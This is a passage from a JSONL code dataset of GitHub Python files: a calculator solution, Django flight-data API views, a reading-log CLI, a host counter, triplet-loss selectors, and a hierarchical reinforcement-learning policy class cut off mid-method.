ans\n\nfor i in range(N):\n    for j in range(M):\n        if array[i][j] == \"L\":\n            if i > 0 and i+1 < N or j > 0 and j+1 < M:\n                result = max(result, bfs(i, j))\nprint(result)\n\n\nclass Solution:\n    def calculate(self, s: str) -> int:\n        \"\"\"\n        Maintain a stack ops that records the overall sign of the current\n        parenthesized scope\n\n        Args:\n            s (str): [description]\n\n        Returns:\n            int: [description]\n        \"\"\"\n        ops, sign, res, l, i = [1], 1, 0, len(s), 0\n        while i < l:\n            if s[i] == ' ':\n                i += 1\n            elif s[i] == '+':\n                sign = ops[-1]\n                i += 1\n            elif s[i] == '-':\n                sign = -ops[-1]\n                i += 1\n            elif s[i] == '(':\n                ops.append(sign)\n                i += 1\n            elif s[i] == ')':\n                ops.pop()\n                i += 1\n            else:\n                num = 0\n                while i < l and '0' <= s[i] <= '9':\n                    num = num * 10 + int(s[i])\n                    i += 1\n                res += sign * num\n        return res\n\ns = \"-(1 + 2 - (3 + 4))\"\nprint(Solution().calculate(s))\n","repo_name":"Aiooon/MyLeetcode","sub_path":"python/224_基本计算器.py","file_name":"224_基本计算器.py","file_ext":"py","file_size_in_byte":1395,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"}
{"seq_id":"2806911476","text":"from django.shortcuts import render\nfrom django.core import serializers\nfrom django.http import HttpResponse\nimport json\nfrom django.http import JsonResponse\nimport requests\nfrom django.views.decorators.csrf import csrf_exempt\nfrom .models import DataFly\n# Create your views here.\n\n\ndef getData(requests):\n    if requests.method == \"GET\":\n        dataSqlite = DataFly.objects.all().values()\n        dataJson = {'data': list(dataSqlite)}\n        print(dataJson)\n        return JsonResponse(dataJson)\n\n\n@csrf_exempt\ndef putData(requests):\n    # names of the table's fields.\n    column_names = [\n        \"fecha_i\",\n        \"vlo_i\",\n        \"ori_i\",\n        \"des_i\",\n        \"emp_i\",\n        \"fecha_o\",\n        \"vlo_o\",\n        \"ori_o\",\n        \"des_o\",\n        \"emp_o\",\n        \"day_month\",\n        \"month_fly\",\n        \"year_fly\",\n        \"day_fly\",\n        \"type_fly\",\n        \"enterprice\",\n        \"siglaori\",\n        \"siglades\",\n    ]\n    if requests.method == \"POST\":\n        print(json.loads(requests.body)[\"data\"])\n        # check that the submitted data matches the columns created in the database.\n        # if they do not match, return a message so the data can be reviewed.\n        for item in json.loads(requests.body)[\"data\"]:\n            print(item)\n            for name in item:\n                print(name)\n                if name not in column_names:\n                    return JsonResponse({'response': 'Error in format, verify your data.'})\n        for item in json.loads(requests.body)[\"data\"]:\n            DataFly.objects.create(\n                fecha_i=item[\"fecha_i\"],\n                vlo_i=item[\"vlo_i\"],\n                ori_i=item[\"ori_i\"],\n                des_i=item[\"des_i\"],\n                emp_i=item[\"emp_i\"],\n                fecha_o=item[\"fecha_o\"],\n                vlo_o=item[\"vlo_o\"], \n                ori_o=item[\"ori_o\"],\n                des_o=item[\"des_o\"],\n                emp_o=item[\"emp_o\"],\n                day_month=item[\"day_month\"],\n                month_fly=item[\"month_fly\"],\n                year_fly=item[\"year_fly\"],\n                day_fly=item[\"day_fly\"],\n                type_fly=item[\"type_fly\"],\n                enterprice=item[\"enterprice\"],\n                siglaori=item[\"siglaori\"],\n                siglades=item[\"siglades\"])\n        \n        return JsonResponse({'response': 'Data loaded'})\n","repo_name":"rosseab-bit/API_SRE","sub_path":"api/api_requests/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":2369,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"}
{"seq_id":"16659211673","text":"#This module contains the command line interface for the reading log...\n#Kevin Huang\n\nimport argparse\n\nprogram_description = \"This is the command line interface for the reading log\"\n\n\nparser = argparse.ArgumentParser(prog='booklog')\nparser.add_argument(\"add\", help=\"add a book\")\nparser.add_argument(\"remove\", help=\"remove a book\", type=int)\nparser.add_argument(\"view\", 
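# (added note) add/remove/view are positional arguments, so a single\n                    # invocation must supply all three values\n                    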
help=\"view list of books\")\nargs = parser.parse_args()\nprint(args.echo)\nprint(args.cube**3)","repo_name":"khuang0312/Reading-Log","sub_path":"commandline.py","file_name":"commandline.py","file_ext":"py","file_size_in_byte":459,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"17123118307","text":"import json\nimport re\nfrom collections import Counter\n\ndef get_hostnames_count(filename):\n with open(r'{}\\{}'.format(\"********\\\\\", filename), 'r') as fi:\n hostname_list = []\n for line in fi:\n hostname_list.append(line.split(' ')[0])\n counts_unique = Counter(hostname_list)\n with open(r'records_{}.txt'.format(str(filename.split('.')[0])), 'w+') as fiw:\n for k in counts_unique:\n str_ = '{} {}'.format(k, counts_unique[k])\n fiw.write(str_)\n","repo_name":"SatyaChipp/_Hackerrank","sub_path":"GoTech/count_hosts.py","file_name":"count_hosts.py","file_ext":"py","file_size_in_byte":522,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"29591144529","text":"from itertools import combinations\n\nimport numpy as np\nimport torch\n\n\ndef pdist(vectors):\n distance_matrix = -2*vectors.mm(torch.t(vectors)) + vectors.pow(2).sum(dim=1).view(1, -1) + vectors.pow(2).sum(dim=1).view(-1, 1)\n return distance_matrix\n\nclass TripletSelector:\n def __int__(self):\n pass\n\n def get_triplets(self, embeddings, labels):\n raise NotImplementedError\n\nclass AllTripletSelector(TripletSelector):\n\n def __init__(self):\n super(AllTripletSelector, self).__init__()\n\n def get_triplets(self, embeddings, labels):\n triplets = []\n for label in set(labels):\n label_mask = (labels == label)\n label_indices = np.where(label_mask)[0]\n if len(label_indices) < 2:\n continue\n negative_indices = np.where(np.logical_not(label_mask))[0]\n anchor_positives = list(combinations(label_indices, 2))\n\n temp_triplets = [[anchor_positive[0], anchor_positive[1], neg_ind] for anchor_positive in anchor_positives for neg_ind in negative_indices]\n\n triplets += temp_triplets\n\n return torch.LongTensor(np.array(triplets))\n\n\ndef hardest_negative(loss_values):\n hardest_negative = np.argmax(loss_values)\n return hardest_negative if loss_values[hardest_negative] > 0 else None\n\n\ndef random_hard_negative(loss_values):\n hard_negatives = np.where(loss_values > 0)[0]\n return np.random.choice(hard_negatives) if len(hard_negatives) > 0 else None\n\n\ndef semihard_negative(loss_values, margin):\n semihard_negatives = np.where(np.logical_and(loss_values < margin, loss_values > 0))[0]\n return np.random.choice(semihard_negatives) if len(semihard_negatives) > 0 else None\n\n\nclass FunctionNegativeTripletSelector(TripletSelector):\n def __init__(self, margin, negative_selector_fn, cpu=True):\n super(FunctionNegativeTripletSelector, self).__init__()\n self.margin = margin\n self.negative_selector_fn = negative_selector_fn\n self.cpu = cpu\n\n def get_triplets(self, embeddings, labels):\n if self.cpu:\n embeddings = embeddings.cpu()\n\n distance_matrix = pdist(embeddings)\n if self.cpu:\n distance_matrix = distance_matrix.cpu()\n\n triplets = []\n\n for label in set(labels):\n label_mask = (labels == label)\n label_indices = np.where(label_mask)[0]\n\n if len(label_indices) < 2:\n continue\n\n negative_indices = np.where(np.logical_not(label_mask))[0]\n anchor_positives = list(combinations(label_indices, 2))\n anchor_positives = np.array(anchor_positives)\n\n ap_distances = distance_matrix[anchor_positives[:, 0], 
anchor_positives[:, 1]]\n\n            for anchor_positive, ap_distance in zip(anchor_positives, ap_distances):\n                loss_values = ap_distance - distance_matrix[torch.LongTensor([anchor_positive[0]]), torch.LongTensor(negative_indices)] + self.margin\n                loss_values = loss_values.data.cpu().numpy()\n                hard_negative = self.negative_selector_fn(loss_values)\n\n                if hard_negative is not None:\n                    hard_negative = negative_indices[hard_negative]\n                    triplets.append([anchor_positive[0], anchor_positive[1], hard_negative])\n\n        if len(triplets) == 0:\n            triplets.append([anchor_positive[0], anchor_positive[1], negative_indices[0]])\n\n        triplets = np.array(triplets)\n\n        return torch.LongTensor(triplets)\n\n\ndef HardestNegativeTripletSelector(margin, cpu=False):\n    return FunctionNegativeTripletSelector(margin=margin, negative_selector_fn=hardest_negative, cpu=cpu)\n\n\ndef RandomHardNegativeTripletSelector(margin, cpu):\n    return FunctionNegativeTripletSelector(margin=margin, negative_selector_fn=random_hard_negative, cpu=cpu)\n\n\ndef SemihardNegativeTripletSelector(margin, cpu):\n    return FunctionNegativeTripletSelector(margin=margin, negative_selector_fn=semihard_negative, cpu=cpu)","repo_name":"NguyenThanhAI/Triplet_loss","sub_path":"utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":4032,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"}
{"seq_id":"7125658052","text":"\"\"\"Base goal-conditioned hierarchical policy.\"\"\"\nimport tensorflow as tf\nimport numpy as np\nfrom copy import deepcopy\nimport os\nimport random\nfrom functools import reduce\n\nfrom hbaselines.base_policies import Policy\nfrom hbaselines.goal_conditioned.replay_buffer import HierReplayBuffer\nfrom hbaselines.utils.reward_fns import negative_distance\nfrom hbaselines.utils.env_util import get_meta_ac_space, get_state_indices\nfrom hbaselines.utils.tf_util import get_trainable_vars\n\n\nclass GoalConditionedPolicy(Policy):\n    \"\"\"Goal-conditioned hierarchical reinforcement learning model.\n\n    Attributes\n    ----------\n    num_levels : int\n        number of levels within the hierarchy. Must be greater than 1. Two\n        levels correspond to a Manager/Worker paradigm.\n    meta_period : int or [int]\n        meta-policy action period. For multi-level hierarchies, a separate meta\n        period can be provided for each level (indexed from highest to lowest)\n    intrinsic_reward_type : str\n        the reward function to be used by the worker. Must be one of:\n\n        * \"negative_distance\": the negative two norm between the states and\n          desired absolute or relative goals.\n        * \"scaled_negative_distance\": similar to the negative distance reward\n          where the states, goals, and next states are scaled by the inverse of\n          the action space of the manager policy\n        * \"non_negative_distance\": the negative two norm between the states and\n          desired absolute or relative goals offset by the maximum goal space\n          (to ensure non-negativity)\n        * \"scaled_non_negative_distance\": similar to the non-negative distance\n          reward where the states, goals, and next states are scaled by the\n          inverse of the action space of the manager policy\n        * \"exp_negative_distance\": equal to exp(-negative_distance^2). The\n          result is a reward between 0 and 1. This is useful for policies that\n          terminate early.\n        * \"scaled_exp_negative_distance\": similar to the previous worker reward\n          type but with states, actions, and next states that are scaled.\n    intrinsic_reward_scale : [float]\n        the value that the intrinsic reward should be scaled by. 
One for each\n meta-level.\n relative_goals : bool\n specifies whether the goal issued by the higher-level policies is meant\n to be a relative or absolute goal, i.e. specific state or change in\n state\n off_policy_corrections : bool\n whether to use off-policy corrections during the update procedure. See:\n https://arxiv.org/abs/1805.08296.\n hindsight : bool\n whether to use hindsight action and goal transitions, as well as\n subgoal testing. See: https://arxiv.org/abs/1712.00948\n subgoal_testing_rate : float\n rate at which the original (non-hindsight) sample is stored in the\n replay buffer as well. Used only if `hindsight` is set to True.\n cooperative_gradients : bool\n whether to use the cooperative gradient update procedure for the\n higher-level policy. See: https://arxiv.org/abs/1912.02368v1\n cg_weights : float\n weights for the gradients of the loss of the lower-level policies with\n respect to the parameters of the higher-level policies. Only used if\n `cooperative_gradients` is set to True.\n pretrain_worker : bool\n specifies whether you are pre-training the lower-level policies.\n Actions by the high-level policy are randomly sampled from its action\n space.\n pretrain_path : str or None\n path to the pre-trained worker policy checkpoints\n pretrain_ckpt : int or None\n checkpoint number to use within the worker policy path. If set to None,\n the most recent checkpoint is used.\n total_steps : int\n Total number of timesteps used during training. Used by a subset of\n algorithms.\n policy : list of hbaselines.base_policies.Policy\n a list of policy object for each level in the hierarchy, order from\n highest to lowest level policy\n replay_buffer : hbaselines.goal_conditioned.replay_buffer.HierReplayBuffer\n the replay buffer object\n goal_indices : list of int\n the state indices for the intrinsic rewards\n intrinsic_reward_fn : function\n reward function for the lower-level policies\n \"\"\"\n\n def __init__(self,\n sess,\n ob_space,\n ac_space,\n co_space,\n buffer_size,\n batch_size,\n actor_lr,\n critic_lr,\n verbose,\n tau,\n gamma,\n use_huber,\n l2_penalty,\n model_params,\n num_levels,\n meta_period,\n intrinsic_reward_type,\n intrinsic_reward_scale,\n relative_goals,\n off_policy_corrections,\n hindsight,\n subgoal_testing_rate,\n cooperative_gradients,\n cg_weights,\n cg_delta,\n pretrain_worker,\n pretrain_path,\n pretrain_ckpt,\n total_steps,\n scope=None,\n env_name=\"\",\n num_envs=1,\n meta_policy=None,\n worker_policy=None,\n additional_params=None):\n \"\"\"Instantiate the goal-conditioned hierarchical policy.\n\n Parameters\n ----------\n sess : tf.compat.v1.Session\n the current TensorFlow session\n ob_space : gym.spaces.*\n the observation space of the environment\n ac_space : gym.spaces.*\n the action space of the environment\n co_space : gym.spaces.*\n the context space of the environment\n buffer_size : int\n the max number of transitions to store\n batch_size : int\n SGD batch size\n actor_lr : float\n actor learning rate\n critic_lr : float\n critic learning rate\n verbose : int\n the verbosity level: 0 none, 1 training information, 2 tensorflow\n debug\n tau : float\n target update rate\n gamma : float\n discount factor\n use_huber : bool\n specifies whether to use the huber distance function as the loss\n for the critic. If set to False, the mean-squared error metric is\n used instead\n model_params : dict\n dictionary of model-specific parameters. See parent class.\n num_levels : int\n number of levels within the hierarchy. 
Must be greater than 1. Two\n levels correspond to a Manager/Worker paradigm.\n meta_period : int or [int]\n meta-policy action period. For multi-level hierarchies, a separate\n meta period can be provided for each level (indexed from highest to\n lowest)\n intrinsic_reward_type : str\n the reward function to be used by the worker. Must be one of:\n\n * \"negative_distance\": the negative two norm between the states and\n desired absolute or relative goals.\n * \"scaled_negative_distance\": similar to the negative distance\n reward where the states, goals, and next states are scaled by the\n inverse of the action space of the manager policy\n * \"non_negative_distance\": the negative two norm between the states\n and desired absolute or relative goals offset by the maximum goal\n space (to ensure non-negativity)\n * \"scaled_non_negative_distance\": similar to the non-negative\n distance reward where the states, goals, and next states are\n scaled by the inverse of the action space of the manager policy\n * \"exp_negative_distance\": equal to exp(-negative_distance^2). The\n result is a reward between 0 and 1. This is useful for policies\n that terminate early.\n * \"scaled_exp_negative_distance\": similar to the previous worker\n reward type but with states, actions, and next states that are\n scaled.\n intrinsic_reward_scale : float or [float]\n the value that the intrinsic reward should be scaled by. One for\n each lower-level.\n relative_goals : bool\n specifies whether the goal issued by the higher-level policies is\n meant to be a relative or absolute goal, i.e. specific state or\n change in state\n off_policy_corrections : bool\n whether to use off-policy corrections during the update procedure.\n See: https://arxiv.org/abs/1805.08296\n hindsight : bool\n whether to include hindsight action and goal transitions in the\n replay buffer. See: https://arxiv.org/abs/1712.00948\n subgoal_testing_rate : float\n rate at which the original (non-hindsight) sample is stored in the\n replay buffer as well. Used only if `hindsight` is set to True.\n cooperative_gradients : bool\n whether to use the cooperative gradient update procedure for the\n higher-level policy. See: https://arxiv.org/abs/1912.02368v1\n cg_weights : float\n weights for the gradients of the loss of the lower-level policies\n with respect to the parameters of the higher-level policies. Only\n used if `cooperative_gradients` is set to True.\n cg_delta : float\n the desired lower-level expected returns. If set to None, a fixed\n Lagrangian specified by cg_weights is used instead. Only used if\n `cooperative_gradients` is set to True.\n pretrain_worker : bool\n specifies whether you are pre-training the lower-level policies.\n Actions by the high-level policy are randomly sampled from the\n action space.\n pretrain_path : str or None\n path to the pre-trained worker policy checkpoints\n pretrain_ckpt : int or None\n checkpoint number to use within the worker policy path. If set to\n None, the most recent checkpoint is used.\n total_steps : int\n Total number of timesteps used during training. Used by a subset of\n algorithms.\n meta_policy : type [ hbaselines.base_policies.Policy ]\n the policy model to use for the meta policies\n worker_policy : type [ hbaselines.base_policies.Policy ]\n the policy model to use for the worker policy\n additional_params : dict\n additional algorithm-specific policy parameters. 
Used internally by\n the class when instantiating other (child) policies.\n \"\"\"\n super(GoalConditionedPolicy, self).__init__(\n sess=sess,\n ob_space=ob_space,\n ac_space=ac_space,\n co_space=co_space,\n verbose=verbose,\n l2_penalty=l2_penalty,\n model_params=model_params,\n num_envs=num_envs,\n )\n\n # Run assertions.\n assert num_levels >= 2, \"num_levels must be greater than or equal to 2\"\n if off_policy_corrections:\n assert num_levels == 2, \\\n \"Off-policy collections only work for two-level hierarchies.\"\n if hindsight:\n assert num_levels == 2, \\\n \"Hindsight only work for two-level hierarchies.\"\n\n # Process some variable.\n if isinstance(meta_period, list) and len(meta_period) == 1:\n meta_period = meta_period[0]\n if isinstance(intrinsic_reward_scale, float):\n intrinsic_reward_scale = [\n intrinsic_reward_scale for _ in range(num_levels - 1)]\n\n self.num_levels = num_levels\n self.meta_period = meta_period\n self.intrinsic_reward_type = intrinsic_reward_type\n self.intrinsic_reward_scale = intrinsic_reward_scale\n self.relative_goals = relative_goals\n self.off_policy_corrections = off_policy_corrections\n self.hindsight = hindsight\n self.subgoal_testing_rate = subgoal_testing_rate\n self.cooperative_gradients = cooperative_gradients\n self.cg_weights = cg_weights\n self.cg_delta = cg_delta\n self.pretrain_worker = pretrain_worker\n self.pretrain_path = pretrain_path\n self.pretrain_ckpt = pretrain_ckpt\n self.total_steps = total_steps\n\n # Get the observation and action space of the higher level policies.\n meta_ac_space = get_meta_ac_space(\n ob_space=ob_space,\n relative_goals=relative_goals,\n env_name=env_name,\n )\n\n # =================================================================== #\n # Step 1: Create the policies for the individual levels. #\n # =================================================================== #\n\n self.policy = []\n\n # The policies are ordered from the highest level to lowest level\n # policies in the hierarchy.\n for i in range(num_levels):\n # Determine the appropriate parameters to use for the policy in the\n # current level.\n policy_fn = meta_policy if i < (num_levels - 1) else worker_policy\n ac_space_i = meta_ac_space if i < (num_levels - 1) else ac_space\n co_space_i = co_space if i == 0 else meta_ac_space\n ob_space_i = ob_space\n\n # The policies are ordered from the highest level to lowest level\n # policies in the hierarchy.\n with tf.compat.v1.variable_scope(\"level_{}\".format(i)):\n # Compute the scope name based on any outer scope term.\n scope_i = \"level_{}\".format(i)\n if scope is not None:\n scope_i = \"{}/{}\".format(scope, scope_i)\n\n model_params_i = model_params.copy()\n model_params_i.update({\n \"ignore_flat_channels\":\n model_params[\"ignore_flat_channels\"] if i < 1 else [],\n \"ignore_image\":\n model_params[\"ignore_image\"] if i < 1 else True,\n })\n\n # Create the next policy.\n self.policy.append(policy_fn(\n sess=sess,\n ob_space=ob_space_i,\n ac_space=ac_space_i,\n co_space=co_space_i,\n buffer_size=buffer_size,\n batch_size=batch_size,\n actor_lr=actor_lr,\n critic_lr=critic_lr,\n verbose=verbose,\n tau=tau,\n gamma=gamma,\n use_huber=use_huber,\n l2_penalty=l2_penalty,\n model_params=model_params_i,\n scope=scope_i,\n **(additional_params or {}),\n ))\n\n # =================================================================== #\n # Step 2: Create attributes for the replay buffer. 
#\n        # =================================================================== #\n\n        # Create the replay buffer.\n        self.replay_buffer = HierReplayBuffer(\n            buffer_size=int(buffer_size/(\n                meta_period ** (num_levels - 1) if isinstance(meta_period, int)\n                else reduce((lambda x, y: x*y), self.meta_period))),\n            batch_size=batch_size,\n            meta_period=meta_period,\n            obs_dim=ob_space.shape[0],\n            ac_dim=ac_space.shape[0],\n            co_dim=None if co_space is None else co_space.shape[0],\n            goal_dim=meta_ac_space.shape[0],\n            num_levels=num_levels\n        )\n\n        # current action by the meta-level policies\n        self.meta_action = [[None for _ in range(num_levels - 1)]\n                            for _ in range(num_envs)]\n\n        # a list of all the actions performed by each level in the hierarchy,\n        # ordered from highest to lowest level policy. A separate element is\n        # used for each environment.\n        self._actions = [[[] for _ in range(self.num_levels)]\n                         for _ in range(num_envs)]\n\n        # a list of the rewards (intrinsic or other) experienced by every level\n        # in the hierarchy, ordered from highest to lowest level policy. A\n        # separate element is used for each environment.\n        self._rewards = [[[0]] + [[] for _ in range(self.num_levels - 1)]\n                         for _ in range(num_envs)]\n\n        # a list of observations that stretch as long as the dilated horizon\n        # chosen for the highest level policy. A separate element is used for\n        # each environment.\n        self._observations = [[] for _ in range(num_envs)]\n\n        # the first and last contextual term. A separate element is used for\n        # each environment.\n        self._contexts = [[] for _ in range(num_envs)]\n\n        # a list of done masks at every time step. A separate element is used\n        # for each environment.\n        self._dones = [[] for _ in range(num_envs)]\n\n        # Collect the state indices for the intrinsic rewards.\n        self.goal_indices = get_state_indices(ob_space, env_name)\n\n        # Define the intrinsic reward function.\n        if intrinsic_reward_type in [\"negative_distance\",\n                                     \"scaled_negative_distance\",\n                                     \"non_negative_distance\",\n                                     \"scaled_non_negative_distance\",\n                                     \"exp_negative_distance\",\n                                     \"scaled_exp_negative_distance\"]:\n            # Offset the distance measure by the maximum possible distance to\n            # ensure non-negativity.\n            if \"non_negative\" in intrinsic_reward_type:\n                offset = np.sqrt(np.sum(np.square(\n                    meta_ac_space.high - meta_ac_space.low), -1))\n            else:\n                offset = 0\n\n            # Scale the outputs from the state by the meta-action space if you\n            # wish to scale the worker reward.\n            if intrinsic_reward_type.startswith(\"scaled\"):\n                scale = 0.5 * (meta_ac_space.high - meta_ac_space.low)\n            else:\n                scale = 1\n\n            def intrinsic_reward_fn(states, goals, next_states):\n                return negative_distance(\n                    states=states[self.goal_indices] / scale,\n                    goals=goals / scale,\n                    next_states=next_states[self.goal_indices] / scale,\n                    relative_context=relative_goals,\n                    offset=0.0,\n                ) + offset\n\n            # Perform the exponential and squashing operations to keep the\n            # intrinsic reward between 0 and 1.\n            if \"exp\" in intrinsic_reward_type:\n                def exp_intrinsic_reward_fn(states, goals, next_states):\n                    span = sum(np.square(self.policy[0].ac_space.high -\n                                         self.policy[0].ac_space.low))\n                    rew = intrinsic_reward_fn(states, goals, next_states)\n                    return np.exp(- (rew / (span / 40)) ** 2)\n                self.intrinsic_reward_fn = exp_intrinsic_reward_fn\n            else:\n                self.intrinsic_reward_fn = intrinsic_reward_fn\n        else:\n            raise ValueError(\"Unknown intrinsic reward type: {}\".format(\n                intrinsic_reward_type))\n\n        # =================================================================== #\n        # Step 3: Create 
algorithm-specific features.                          #\n        # =================================================================== #\n\n        # the number of get_action calls that have been performed. This is used\n        # when pretraining the worker to incrementally train different levels\n        # of the policy.\n        self._steps = 0\n\n        # a fixed goal transition function for the meta-actions in between meta\n        # periods. This is used when relative_goals is set to True in order to\n        # maintain a fixed absolute position of the goal.\n        if relative_goals:\n            def goal_transition_fn(obs0, goal, obs1):\n                return obs0 + goal - obs1\n        else:\n            def goal_transition_fn(obs0, goal, obs1):\n                return goal\n        self.goal_transition_fn = goal_transition_fn\n\n        if self.cooperative_gradients:\n            if scope is None:\n                self._setup_cooperative_gradients()\n            else:\n                with tf.compat.v1.variable_scope(scope):\n                    self._setup_cooperative_gradients()\n\n    def initialize(self):\n        \"\"\"See parent class.\n\n        This method performs the following operations:\n\n        - It calls the initialization methods of the policies at every level of\n          the hierarchy to match the target value function parameters with the\n          current policy parameters.\n        - It also imports the lower-level policies from a pretrained checkpoint\n          if a path to one is specified.\n        \"\"\"\n        # Initialize the separate policies in the hierarchy.\n        for i in range(self.num_levels):\n            self.policy[i].initialize()\n\n        if self.pretrain_path is not None:\n            ckpt_path = os.path.join(self.pretrain_path, \"checkpoints\")\n\n            # Get the checkpoint number.\n            if self.pretrain_ckpt is None:\n                filenames = os.listdir(ckpt_path)\n                metafiles = [f[:-5] for f in filenames if f[-5:] == \".meta\"]\n                metanum = [int(f.split(\"-\")[-1]) for f in metafiles]\n                ckpt_num = max(metanum)\n            else:\n                ckpt_num = self.pretrain_ckpt\n\n            # Extract the checkpoint path.\n            ckpt_path = os.path.join(ckpt_path, \"itr-{}\".format(ckpt_num))\n            var_list = tf.train.list_variables(ckpt_path)\n            ckpt_reader = tf.train.load_checkpoint(ckpt_path)\n\n            # Check that the number of levels matches.\n            assert var_list[-1][0].startswith(\n                \"level_{}\".format(self.num_levels-1)), \\\n                \"Number of levels between the checkpoint and current policy \" \\\n                \"does not match. 
Policy={}, Checkpoint={}\".format(\n                    self.num_levels,\n                    int(var_list[-1][0].split(\"/\")[0][6:]) + 1)\n\n            # Check that the names and shapes of the lowest-level policy\n            # parameters match the current policy.\n            current_vars = {\n                v.name: v.shape.as_list()\n                for v in get_trainable_vars()\n            }\n            for var in var_list:\n                var_name, var_shape = var\n                var_name = \"{}:0\".format(var_name)\n                # We only check the lower-level policies.\n                if any(var_name.startswith(\"level_{}\".format(level))\n                       for level in range(1, self.num_levels)):\n                    assert var_name in current_vars.keys(), \\\n                        \"{} not available in current policy.\".format(var_name)\n                    current_shape = current_vars[var_name]\n                    assert current_shape == var_shape, \\\n                        \"Shape mismatch for {}, {} != {}\".format(\n                            var_name, var_shape, current_shape)\n\n            # Import the lower-level policy parameters.\n            current_vars = {v.name: v for v in get_trainable_vars()}\n            for var in var_list:\n                var_name, var_shape = var\n                if any(var_name.startswith(\"level_{}\".format(level))\n                       for level in range(1, self.num_levels)):\n                    value = ckpt_reader.get_tensor(var_name)\n                    var_name = \"{}:0\".format(var_name)\n                    self.sess.run(\n                        tf.compat.v1.assign(current_vars[var_name], value))\n\n    def update(self, update_actor=True, **kwargs):\n        \"\"\"Perform a gradient update step.\n\n        This is done at every level of the hierarchy.\n\n        The kwargs argument for this method contains two additional terms:\n\n        * update_meta (bool): specifies whether to perform a gradient update\n          step for the meta-policies\n        * update_meta_actor (bool): similar to the `update_actor` term, but\n          for the meta-policy. Note that, if `update_meta` is set to False,\n          this term is void.\n\n        **Note**: The soft target updates for all policies occur at the\n        same frequency as their respective actor update frequencies.\n\n        Parameters\n        ----------\n        update_actor : bool\n            specifies whether to update the actor policy. The critic policy is\n            still updated if this value is set to False.\n        \"\"\"\n        # Not enough samples in the replay buffer.\n        if not self.replay_buffer.can_sample():\n            return\n\n        # Specifies whether to remove additional data from the replay buffer\n        # sampling procedure. Since only a subset of algorithms use additional\n        # data, removing it can speed up the other algorithms.\n        with_additional = self.off_policy_corrections\n\n        # Specifies the levels to collect data from, corresponding to the\n        # levels that will be trained. 
This also helps speedup the operation.\n collect_levels = [i for i in range(self.num_levels - 1) if\n kwargs[\"update_meta\"][i]] + [self.num_levels - 1]\n\n # Get a batch.\n obs0, obs1, act, rew, done, additional = self.replay_buffer.sample(\n with_additional, collect_levels)\n\n # Do not use done masks for lower-level policies with negative\n # intrinsic rewards (these the policies to terminate early).\n if self._negative_reward_fn():\n for i in range(self.num_levels - 1):\n done[i+1] = np.array([False] * len(done[i+1]))\n\n # Loop through all meta-policies.\n for i in range(self.num_levels - 1):\n if kwargs['update_meta'][i] and not self._pretrain_level(i):\n # Replace the goals with the most likely goals.\n if self.off_policy_corrections and i == 0: # FIXME\n meta_act = self._sample_best_meta_action(\n meta_obs0=obs0[i],\n meta_obs1=obs1[i],\n meta_action=act[i],\n worker_obses=additional[\"worker_obses\"],\n worker_actions=additional[\"worker_actions\"],\n k=8\n )\n act[i] = meta_act\n\n if self.cooperative_gradients:\n # Perform the cooperative gradients update procedure.\n self._cooperative_gradients_update(\n obs0=obs0,\n actions=act,\n rewards=rew,\n obs1=obs1,\n terminals1=done,\n level_num=i,\n update_actor=kwargs['update_meta_actor'],\n )\n else:\n # Perform the regular meta update procedure.\n self.policy[i].update_from_batch(\n obs0=obs0[i],\n actions=act[i],\n rewards=rew[i],\n obs1=obs1[i],\n terminals1=done[i],\n update_actor=kwargs['update_meta_actor'],\n )\n\n # Update the lowest level policy.\n self.policy[-1].update_from_batch(\n obs0=obs0[-1],\n actions=act[-1],\n rewards=rew[-1],\n obs1=obs1[-1],\n terminals1=done[-1],\n update_actor=update_actor,\n )\n\n def get_action(self, obs, context, apply_noise, random_actions, env_num=0):\n \"\"\"See parent class.\"\"\"\n # Increment the internal number of get_action calls.\n self._steps += 1\n\n # Loop through the policies in the hierarchy.\n for i in range(self.num_levels - 1):\n if self._update_meta(i, env_num):\n if self._pretrain_level(i):\n # Sample goals randomly when performing pre-training.\n self.meta_action[env_num][i] = np.array([\n self.policy[i].ac_space.sample()])\n else:\n context_i = context if i == 0 \\\n else self.meta_action[env_num][i - 1]\n\n # Update the meta action based on the output from the\n # policy if the time period requires is.\n self.meta_action[env_num][i] = self.policy[i].get_action(\n obs, context_i, apply_noise, random_actions)\n else:\n # Update the meta-action in accordance with a fixed transition\n # function.\n self.meta_action[env_num][i] = self.goal_transition_fn(\n obs0=np.array(\n [self._observations[env_num][-1][self.goal_indices]]),\n goal=self.meta_action[env_num][i],\n obs1=obs[:, self.goal_indices]\n )\n\n # Return the action to be performed within the environment (i.e. 
the\n # action by the lowest level policy).\n action = self.policy[-1].get_action(\n obs=obs,\n context=self.meta_action[env_num][-1],\n apply_noise=apply_noise,\n random_actions=random_actions and self.pretrain_path is None)\n\n return action\n\n def store_transition(self, obs0, context0, action, reward, obs1, context1,\n done, is_final_step, env_num=0, evaluate=False):\n \"\"\"See parent class.\"\"\"\n # the time since the most recent sample began collecting step samples\n t_start = len(self._observations[env_num])\n\n # Flatten the observations.\n obs0 = obs0.flatten()\n obs1 = obs1.flatten()\n\n for i in range(1, self.num_levels):\n # Actions and intrinsic rewards for the high-level policies are\n # only updated when the action is recomputed by the graph.\n if self._update_meta(self.num_levels - i, env_num):\n self._rewards[env_num][-i].append(0)\n self._actions[env_num][-i-1].append(\n self.meta_action[env_num][-i].flatten())\n\n # Compute the intrinsic rewards and append them to the list of\n # rewards.\n self._rewards[env_num][-i][-1] += \\\n self.intrinsic_reward_scale[-i] * \\\n self.intrinsic_reward_fn(\n states=obs0,\n goals=self.meta_action[env_num][-i].flatten(),\n next_states=obs1\n )\n\n # The highest level policy receives the sum of environmental rewards.\n self._rewards[env_num][0][0] += reward\n\n # The lowest level policy's actions are received from the algorithm.\n self._actions[env_num][-1].append(action)\n\n # Add the environmental observations and contextual terms to their\n # respective lists.\n self._observations[env_num].append(obs0)\n if t_start == 0:\n self._contexts[env_num].append(context0)\n\n # Modify the done mask in accordance with the TD3 algorithm. Done masks\n # that correspond to the final step are set to False.\n self._dones[env_num].append(done and not is_final_step)\n\n # Add a sample to the replay buffer.\n if self._update_meta(0, env_num) or done:\n # Add the last observation and context.\n self._observations[env_num].append(obs1)\n 